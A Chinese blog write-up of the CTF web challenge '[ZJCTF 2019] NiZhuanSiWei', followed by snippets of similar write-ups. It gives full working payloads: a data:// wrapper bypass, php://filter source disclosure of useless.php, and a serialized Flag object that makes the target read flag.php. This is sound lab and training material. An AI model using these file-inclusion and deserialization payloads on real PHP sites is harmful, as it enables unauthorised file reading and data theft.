[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-04-08 00:35:41 发布
原创 最新推荐文章于 2024-04-08 00:35:41 发布 · 1.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web

博客围绕CTF题目展开,涉及data协议绕过、filter文件读取和反序列化绕过。打开靶机看到代码,尝试用filter读取文件无果,参考他人方法先利用data协议绕过写入内容,再用filter读取文件,解码后得到新代码,最后将序列化内容作为参数构造payload,查看源码获得flag。

考察内容:
1.data协议绕过
2.filter文件读取
3.反序列化绕过

看到这个题目我一开始还拼了半天,据我的猜测来看应该是 逆转思维???
在这里插入图片描述
一打开靶机 我们可以看到一段代码
看到代码中有useless.php,我们打开看一下 emmm 但是什么都没有真的就是useless
欲尝试 利用filter来进行文件读取 但是依旧也没有回显出来什么
参考了别人的wp 是要先利用data协议绕过 将welcome to the zjctf写入
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= (d2VsY29tZSB0byB0aGUgempjdGY=是welcome to the zjctf的base64编码形式)
在这里插入图片描述
代码中有正则匹配,我们需要绕过~~
此时我们可以先利用filter进行文件读取text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
在这里插入图片描述

出现了base64,我们将其进行解码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

阿这,这个题还没结束,解出来了新的代码。。。阿,对哦,还有一个参数这怎么能算完呢。
我们可以看到这里将password的值反序列化了
在这里插入图片描述
那么我们就将file=flag.php进行序列化作为password的参数应该就可以获得flag了

<?php
class Flag{
	public $file="flag.php";
}
$a = new Flag();
echo serialize($a);
?>

得到:O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
构造payload:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
在这里插入图片描述
查看源码 获得flag
在这里插入图片描述

BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 610
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化
oZuoShen123的博客
10-09 1145
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "".file_get_contents($text,'r').""; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file);
每天一道ctf
whisper921的博客
11-13 1054
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1577
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 4393
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
练习 24 Web [ZJCTF 2019]NiZhuanSiWei
最新发布
离暑假还有41天的博客
04-08 545
反序列化,PHP伪造协议读写
BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei
yanglinchiji的博客
11-06 327
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容。将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出。还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码。获取结果后,将其传给password。3.这道题是有序列化和反序列化的。出现base64码,解码后,得到。1.需要给text传输一句话。进行正则匹配,禁止出现flag。接下来,尝试伪协议查看。参考他人wp后,发现。
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初 · mochu7
11-05 1382
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值